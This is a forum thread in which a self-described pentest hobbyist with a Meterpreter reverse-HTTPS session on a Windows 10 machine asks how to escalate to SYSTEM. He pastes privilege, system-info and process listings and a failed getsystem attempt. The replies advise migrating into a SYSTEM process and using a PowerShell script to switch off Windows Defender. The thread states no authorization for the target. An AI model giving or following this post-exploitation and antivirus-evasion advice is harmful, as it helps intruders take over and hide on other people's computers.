PrivEsc lpe windows meterpreter

goingHeavenTogether · 20.10.2025

hi. Софт создает обратное подключение по https. Сейчас есть такой доступ. Вопрос как тут можно повыситься до системы?

Sorry stupid question. I am pentest hobbyist.

p.s. на тачке вин дефендер работает

meterpreter > getprivs

Enabled Process Privileges
==========================

Name
----
SeIncreaseWorkingSetPrivilege
SeShutdownPrivilege
SeTimeZonePrivilege
SeUndockPrivilege
SeChangeNotifyPrivilege

meterpreter > sysinfo
Computer : DESKTOP-P4V5R4I
OS : Windows 10 22H2+ (10.0 Build 19045).
Architecture : x64
System Language : ru_RU
Domain : WORKGROUP
Logged On Users : 2
Meterpreter : x64/windows
meterpreter >
meterpreter > ps

Process List
============

PID PPID Name Arch Session User Path
--- ---- ---- ---- ------- ---- ----
0 0 [System Process]
4 0 System
8 732 svchost.exe
124 4 Registry
408 4 smss.exe
472 732 svchost.exe
512 500 csrss.exe
588 500 wininit.exe
596 580 csrss.exe
688 580 winlogon.exe
732 588 services.exe
752 588 lsass.exe
852 732 svchost.exe
860 732 svchost.exe
872 860 SecHealthUI.exe x64 1 DESKTOP-P4V5R4I\vic C:\Windows\SystemApps\Microsoft.Windows.SecHealthUI_cw5n1h2txyewy\SecHealthUI.
exe
888 688 fontdrvhost.exe
896 588 fontdrvhost.exe
980 688 dwm.exe
992 732 svchost.exe
1056 860 SearchApp.exe x64 1 DESKTOP-P4V5R4I\vic C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
1076 860 dllhost.exe
1168 732 svchost.exe
1216 732 svchost.exe
1224 732 svchost.exe
1256 732 svchost.exe
1288 732 svchost.exe
1296 732 svchost.exe
1304 732 svchost.exe
1376 732 svchost.exe
1404 732 svchost.exe
1412 732 svchost.exe x64 1 DESKTOP-P4V5R4I\vic C:\Windows\System32\svchost.exe
1468 732 svchost.exe
1508 732 VBoxService.exe
1552 732 svchost.exe
1560 732 svchost.exe
1568 732 svchost.exe
1652 1712 msedgewebview2.exe x64 1 DESKTOP-P4V5R4I\vic C:\Program Files (x86)\Microsoft\EdgeWebView\Application\141.0.3537.85\msedgew
ebview2.exe
1660 732 svchost.exe
1684 732 svchost.exe
1712 2944 msedgewebview2.exe x64 1 DESKTOP-P4V5R4I\vic C:\Program Files (x86)\Microsoft\EdgeWebView\Application\141.0.3537.85\msedgew
ebview2.exe
1736 732 svchost.exe
1744 732 svchost.exe
1764 1712 msedgewebview2.exe x64 1 DESKTOP-P4V5R4I\vic C:\Program Files (x86)\Microsoft\EdgeWebView\Application\141.0.3537.85\msedgew
ebview2.exe
1776 732 svchost.exe
1804 4 Memory Compression
1844 732 svchost.exe
1860 7160 msedge.exe x64 1 DESKTOP-P4V5R4I\vic C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
1868 732 svchost.exe
1884 732 svchost.exe
1948 732 svchost.exe
2036 732 svchost.exe
2108 732 svchost.exe
2228 732 svchost.exe
2332 732 svchost.exe
2336 732 svchost.exe
2344 732 svchost.exe
2352 732 svchost.exe
2436 732 svchost.exe
2480 732 svchost.exe
2592 732 spoolsv.exe
2632 732 svchost.exe
2688 732 svchost.exe
2708 732 svchost.exe
2788 732 svchost.exe
2876 860 RuntimeBroker.exe x64 1 DESKTOP-P4V5R4I\vic C:\Windows\System32\RuntimeBroker.exe
2888 732 svchost.exe
2944 860 SearchApp.exe x64 1 DESKTOP-P4V5R4I\vic C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
2968 7160 msedge.exe x64 1 DESKTOP-P4V5R4I\vic C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
3012 852 ctfmon.exe x64 1
3016 732 svchost.exe
3028 732 svchost.exe
3056 732 svchost.exe
3064 732 svchost.exe
3096 1256 MicrosoftEdgeUpdate.exe
3152 732 MsMpEng.exe
3196 732 MpDefenderCoreService.exe
3232 732 svchost.exe
3304 860 SecurityHealthHost.exe x64 1 DESKTOP-P4V5R4I\vic C:\Windows\System32\SecurityHealthHost.exe
3368 732 svchost.exe
3408 732 svchost.exe
3820 732 SearchIndexer.exe
3920 1376 sihost.exe x64 1 DESKTOP-P4V5R4I\vic C:\Windows\System32\sihost.exe
3948 732 svchost.exe x64 1 DESKTOP-P4V5R4I\vic C:\Windows\System32\svchost.exe
3976 732 svchost.exe x64 1 DESKTOP-P4V5R4I\vic C:\Windows\System32\svchost.exe
4040 1256 taskhostw.exe x64 1 DESKTOP-P4V5R4I\vic C:\Windows\System32\taskhostw.exe
4188 732 svchost.exe
4228 7160 msedge.exe x64 1 DESKTOP-P4V5R4I\vic C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
4240 732 svchost.exe
4464 7160 msedge.exe x64 1 DESKTOP-P4V5R4I\vic C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
4672 732 svchost.exe
4912 3016 AggregatorHost.exe
4952 1712 msedgewebview2.exe x64 1 DESKTOP-P4V5R4I\vic C:\Program Files (x86)\Microsoft\EdgeWebView\Application\141.0.3537.85\msedgew
ebview2.exe
4988 4932 explorer.exe x64 1 DESKTOP-P4V5R4I\vic C:\Windows\explorer.exe
5148 732 svchost.exe
5352 860 RuntimeBroker.exe x64 1 DESKTOP-P4V5R4I\vic C:\Windows\System32\RuntimeBroker.exe
5508 4988 GUP.exe x64 1 DESKTOP-P4V5R4I\vic C:\Users\vic\Desktop\updater\GUP.exe
5564 732 svchost.exe x64 1 DESKTOP-P4V5R4I\vic C:\Windows\System32\svchost.exe
5616 860 StartMenuExperienceHost.exe x64 1 DESKTOP-P4V5R4I\vic C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\
StartMenuExperienceHost.exe
5876 732 NisSrv.exe
6100 860 SkypeBackgroundHost.exe x64 1 DESKTOP-P4V5R4I\vic C:\Program Files\WindowsApps\Microsoft.SkypeApp_14.53.77.0_x64__kzf8qxf38zg5c\
SkypeBackgroundHost.exe
6124 732 svchost.exe
6424 732 svchost.exe
6532 732 svchost.exe
6584 860 ApplicationFrameHost.exe x64 1 DESKTOP-P4V5R4I\vic C:\Windows\System32\ApplicationFrameHost.exe
6676 732 svchost.exe
6912 4988 SecurityHealthSystray.exe x64 1 DESKTOP-P4V5R4I\vic C:\Windows\System32\SecurityHealthSystray.exe
6948 732 SecurityHealthService.exe
7004 4988 VBoxTray.exe x64 1 DESKTOP-P4V5R4I\vic C:\Windows\System32\VBoxTray.exe
7024 1712 msedgewebview2.exe x64 1 DESKTOP-P4V5R4I\vic C:\Program Files (x86)\Microsoft\EdgeWebView\Application\141.0.3537.85\msedgew
ebview2.exe
7140 4988 OneDrive.exe x86 1 DESKTOP-P4V5R4I\vic C:\Users\vic\AppData\Local\Microsoft\OneDrive\OneDrive.exe
7160 4988 msedge.exe x64 1 DESKTOP-P4V5R4I\vic C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
7200 860 SkypeApp.exe x64 1 DESKTOP-P4V5R4I\vic C:\Program Files\WindowsApps\Microsoft.SkypeApp_14.53.77.0_x64__kzf8qxf38zg5c\
SkypeApp.exe
7208 1712 msedgewebview2.exe x64 1 DESKTOP-P4V5R4I\vic C:\Program Files (x86)\Microsoft\EdgeWebView\Application\141.0.3537.85\msedgew
ebview2.exe
7552 860 RuntimeBroker.exe x64 1 DESKTOP-P4V5R4I\vic C:\Windows\System32\RuntimeBroker.exe
7728 732 svchost.exe
7784 860 RuntimeBroker.exe x64 1 DESKTOP-P4V5R4I\vic C:\Windows\System32\RuntimeBroker.exe
8008 732 svchost.exe
8072 732 svchost.exe

goingHeavenTogether · 20.10.2025

meterpreter > getsystem
[-] priv_elevate_getsystem: Operation failed: All pipe instances are busy. The following was attempted:
[-] Named Pipe Impersonation (In Memory/Admin)
[-] Named Pipe Impersonation (Dropper/Admin)
[-] Token Duplication (In Memory/Admin)
[-] Named Pipe Impersonation (RPCSS variant)
[-] Named Pipe Impersonation (PrintSpooler variant)
[-] Named Pipe Impersonation (EFSRPC variant - AKA EfsPotato)

cutedemon · 21.10.2025

Смотришь процессы команда - ps , потом выбираешь процесс который запущен от имени системы , теперь команда migrate - PID(номер процесса), затем getsystem, может помочь

cutedemon · 21.10.2025

Либо найди , скрипт который через powershell вырубает дефендер

Klordane · 26.10.2025

cutedemon сказал(а):

Либо найди , скрипт который через powershell вырубает дефендер

Не вырубит дефендер так просто скриптом...
Ну допустим, потушил дефендер, а что дальше?..

PrivEsc lpe windows meterpreter

goingHeavenTogether

HDD-drive

goingHeavenTogether

HDD-drive

cutedemon

(L3) cache

cutedemon

(L3) cache

Klordane

HDD-drive